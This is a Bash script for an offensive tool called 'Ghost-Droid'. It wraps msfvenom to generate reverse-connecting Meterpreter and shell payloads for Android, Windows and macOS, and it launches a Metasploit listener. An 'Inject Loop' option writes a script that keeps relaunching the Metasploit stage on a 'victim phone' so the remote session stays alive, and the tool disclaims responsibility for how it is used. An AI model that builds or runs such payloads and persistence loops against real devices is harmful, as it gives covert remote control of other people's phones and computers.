# Created by Harsh Mishra

# Tool : Ghost-Droid

# Do not copy or try to modify the codes.   License included 

# YT channel : https://www.youtube.com/channel/UCCB3ApWZfL3E7yHF6gESX9g


# Now Generate payload in Android.

# I am and my tool will not responsible for any of your action

re='\e[1;31m'
white='\e[1;37m'
blue='\e[1;34m'
Escape="\033";
ref="${Escape}[31m";
gf="${Escape}[32m";
lgf="${Escape}[92m"
yf="${Escape}[33m";
bf="${Escape}[34m";
cf="${Escape}[36m";
ee="${Escape}[0m";
pu='\033[1;35m'
cy='\e[0;36m'
lg='\e[1;32m'
ye='\e[1;33m'
ver=v1.1


function banner(){

clear
echo -e $ye " "
echo -e "                      @"
echo -e "          ${re}           @ @     @"

echo -e "                @   @   @ ${ye}  @ @   "
echo -e "           ${re}    @ @  @${ye}   @  @ ${re}  @  "  
echo -e "              @  @ @     @ @    @ "  
echo -e "           ${ye}  @    @      ${re} @      @  "
echo -e "        ${ye}    @                     @"
echo -e "           @    ${lg}   jggggggggb.  ${ye}   @"
echo -e "          @    ${lg}   gg        gg   ${ye}   @"
echo -e "         @    ${lg}   gg              ${ye}    @  " 
echo -e "        @    ${lg}   gg                 ${ye}   @"
echo -e "       @      ${lg} gg                    ${ye}  @"
echo -e "       @      ${lg} GG         kkkk      ${ye}   @"
echo -e "        @      ${lg}hh           pp     ${ye}   @"
echo -e "         @     ${lg} oo          hh     ${ye}  @"
echo -e "          @      ${lg}ss         GG  ${ye}    @  "
echo -e "  ${ye}         @      ${lg}TTmmaaNHNkk*   ${ye}  @"
echo -e "   ${ye}        @                       @"
echo -e "           @                       @"
echo -e "           @@@@@@@@@@@@@@@@@@@@@@@@@"
echo -e "     ${ye}      |  ${re}    (GhosTmaN)     ${ye}  |"
echo -e "   $ye        | ${cy}Author : ${bf}Harsh Mishra ${ye}|   ${ye} $ver "
echo -e "           ${ye}|-----------------------|"
echo -e "     ${ye}      |    ${lg}  Ghost-Droid   ${ye}   |"
echo -n  -e "     ${ye}      @@@@@@@@@@@@@@@@@@@@@@@@@"
read gar

}

function checkinternet(){

clear
figlet -f smmono9 "Ghost-Droid" | lolcat
echo -e $lg " [¥] Checking your Internet Connection "
echo " "
ping -c 1 google.com > /dev/null 2>&1
if [[ "$?" != 0 ]]
 then
    echo -e $ye " [-] Internet:${re} FAILED"
    echo ""
    echo -e $lgf " This Script Needs An Active Internet Connection"
    echo ""
    echo -e $ye "               Ghost-Droid Exit" 
    echo "." | lolcat
    sleep 2
    exit
  else
    echo -e $ye " [√] Internet:${lg} CONNECTED"
    sleep 2
  fi

}

function start(){

clear
echo " " 
echo " "
echo -e $ye "|----------------------------------------|"
echo -e $ye "| ${re}Don't copy or try to modify the codes${ye}  |"
echo -e	$ye "|----------------------------------------|" 
echo -e $ye " Me or my tool is not responsible for "  
echo "       any of your action " 
echo " " 
sleep 2
figlet -f mono9 "Ghost"
figlet -f mono9 "Droid" 
sleep 2

}
function server(){

clear
echo -e $blue " [${ye}∆${blue}] Setting up the Server........."
initdb $PREFIX/var/lib/postgresql > /dev/null 2>&1 
pg_ctl -D $PREFIX/var/lib/postgresql start > /dev/null 2>&1
echo ""
echo ""                                
echo -e $lgf " [${re}S${lgf}] Server has been Started "
sleep 2
echo $ye " "

}

function exip(){

clear
echo " "
echo -e $cy "   +----------------------------------------+"
echo -e $cy "   |     ${ye}Thanks for using Ghost-Droid       ${cy}|"
echo -e $cy "   |        ${ye}See you at next time            ${cy}|"
echo -e $cy "   |----------------------------------------|"
echo -e $cy "   |           ${lg}Bye Bye ( ^_^)/              ${cy}|"
echo -e $cy "   +----------------------------------------+"
echo ""
echo "        Friends keep supporting me and " | lolcat
echo "        motivating me for making new tools " | lolcat
echo "        FOR YOU " | lolcat
echo " "
sleep 1
exit

}

function lhost(){

echo -e $lg " Enter Local Host(your inet IP or public IP "
echo -n -e $ye " [H]: "
read lhost

}
function lport(){

echo -e $lg " Assign Local Port (ex:4444) "
echo -n -e $ye " [P]: "
read lport

}
function pname(){

echo -n -e $lg " [N] Assign a name(ex: spy) :> ${ye}"
read name

}

function listener(){

echo -e $ye " [ ${lg}+${ye} ]${blue} This could take few seconds to start......."
msfconsole 

}

function android(){

clear
figlet -f pagga " Ghost-Droid " | lolcat
echo "--------------[ Generate Payload ]---------------"
echo ""
lhost
echo " "
lport
echo " "
echo ""
pname
echo ""
echo " [@] This could take a while........." 
echo " "
msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport --platform android R -o /sdcard/ghost/$name.apk > /dev/null 2>&1
echo -e $ye " "
echo " Generated payload is saved in ghost directory "
echo -e $re " "
ls /sdcard/ghost | cat -n 
echo ""
returu

}

function windows(){

clear
figlet -f pagga " Ghost-Droid " | lolcat
echo "--------------[ Generate Payload ]---------------"
echo ""
lhost
lport
pname
echo ""
echo " This could take a while........."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > /sdcard/ghost/$name.exe > /dev/null 2>&1
echo ""
echo -e $ye " Your payload has been saved in your sdcard in the ghost directory "
echo -e $re ""
ls /sdcard/ghost | cat -n
echo " "
returu

}

function mac(){

clear
figlet -f pagga " Ghost-Droid " | lolcat
echo "--------------[ Generate Payload ]---------------"
echo ""
lhost
lport
pname
echo ""
echo -e $ye " This could take a while......."
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > /sdcard/ghost/$name.macho > /dev/null 2>&1 
echo ""
echo -e $ye " Your payload has been saved in your sdcard in the ghost directory "
echo -e $re ""
ls /sdcard/ghost | cat -n
echo " "
returu

}

function update(){

clear
figlet -f smmono12 " UPDATE" | lolcat
echo -e $re " Updating ${lg}Ghost-Droid.......... "
echo -e $ye " This could take few seconds......"
cd $HOME/Ghost-Droid
git reset --hard
git pull
echo " "
echo -e "${blue} [ ${re}✔ ${blue}] ${ye}Ghost-Droid Updated........"

}

function returu(){

echo -e $cy "   +------------[ ${ye}Ghost-Droid${cy} ]-------------+"
echo -e $cy "   | ${pu}[${re}1${pu}] ${ye}Main-menu                          ${cy}|"
echo -e $cy "   | ${pu}[${re}2${pu}] ${ye}Exit                               ${cy}|"
echo -e $cy "   +----------------------------------------+"
echo -n -e $cy "Ghost:>${ye} "
read f
case $f in
      1) main_menu
      ;;
      2) exip
      ;;
      *) clear 
         echo " [-] Invalid Input "
         returu
      ;;
esac

}

function menu(){

clear
echo -e $ye "   +------------{ ${ref}Payload Menu ${ye}}------------+"
echo -e $ye "   |                                        |"
echo -e $ye "   | ${bf}[${lg}01${bf}] ${re}Payload for Android               ${ye}|"
echo -e $ye "   | ${bf}[${lg}02${bf}] ${re}Payload for Windows               ${ye}|"
echo -e $ye "   | ${bf}[${lg}03${bf}] ${re}Payload for MacOs                 ${ye}|"
echo -e $ye "   | ${bf}[${lg}04${bf}] ${re}Back                              ${ye}|"
echo -e $ye "   |----------------------------------------|"
echo -n "type:> "
read type
case $type in
      1) android
      ;;
      2) windows
      ;;
      3) mac
      ;;
      4) main_menu
      ;;
      *) echo " [-] Invalid Input "
         echo " [^] Press enter to continue........"
         read zz
         menu
      ;;
esac

}

function remove(){

    echo -e $ye ""
    echo " This Module will delete all the files present in "
    echo -e $re " ghost${ye} directory of your sdcard "
    echo " "
    echo -e $cy " [=] Your Files "
    ls /sdcard/ghost | cat -n 
    echo -n -e $lg " Do you want to continue (y/n):"
        read gok
        if [ $gok == 'y' ]
         then
            cd /sdcard/ghost
            rm *
            cd $HOME
         elif [ $gok == 'n' ]
          then
            main_menu
         else
            echo -e $ye"          Invalid Input "
            remove
        fi
   
}

function main_menu(){

clear
figlet -f smmono9 "GHOST-DROID"
echo -e $lgf "  __________________________________________"
echo -e $lgf "  |${ref}========================================${lgf}|"
echo -e $lgf "  |${ref}========[ ${ye}Ghost-Droid${ref} ]=================${lgf}|"
echo -e $lgf "  |${ref}===========================[ ${ye}$ver ${ref}]=====${lgf}|"
echo -e $lg "  |${ref}========================================${lgf}|"
echo -e $lgf "  |              ${blue}[Main Menu]               ${lgf}|"
echo -e $lgf "  |${gf}----------------------------------------${lgf}|"
echo -e $lgf "  | ${re}[${ye}1${re}] ${ye}Generate Payload                   ${lgf}|"
echo -e $lgf "  | ${re}[${ye}2${re}] ${ye}Start Listener                     ${lgf}|"
echo -e $lgf "  | ${re}[${ye}3${re}] ${ye}Inject Loop                        ${lgf}|"
echo -e $lgf "  | ${re}[${ye}u${re}] ${ye}Update                             ${lgf}|"
echo -e $lgf "  | ${re}[${ye}c${re}] ${ye}Clear Directory                    ${lgf}|"
echo -e $lgf "  | ${re}[${ye}e${re}] ${ye}Exit                               ${lgf}|"
echo -e $lgf "  |${gf}________________________________________${lgf}|"
echo -e $cy " "
echo -e -n " Ghost:> ${ye}"
read cho
case $cho in
     1) clear
        menu
        returu
     ;;
     2) clear
        listener
        returu
     ;;
     3) echo ""
        if [ ! -f "/sdcard/inject/inject.sh" ]
         then
            printf "#!/system/bin/sh\nwhile :\ndo am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity\nsleep 20\ndone" > /sdcard/inject/inject.sh
        fi
        echo -e " ${ye}[${lg} + ${ye}] ${blue}A new file created inject.sh in inject"
        echo "       folder of your sdcard "
        sleep 2
        echo -e $lg "  Use it if payload has been installed on "
        echo -e $lg "  your victim phone ${ye}(${re} *${blue}_${re}*${ye})${lgf}| " 
        sleep 2
        echo -e $ye "Follow the steps as shown in the video tutorial"
        echo " "
        echo -e $blue"  This will also solve session dead problem"
        returu
     ;;
     u) echo " "
        echo -e $ye "        Ghost-Droid${re} $ver "
        sleep 2
        update
        sleep 2
        cd Ghost-Droid
        chmod 777 setup.sh
        ./setup.sh
        cd 
        returu
     ;;
     c) clear
        remove
        returu
     ;;
     e) echo " "
        exip
     ;;
     *) figlet -f big "      Invalid" | lolcat
        figlet -f big "         Input" | lolcat
        echo -n " Press enter to continue......" | lolcat
        read s
        main_menu
     ;;
esac

}
start
checkinternet
server
banner
main_menu
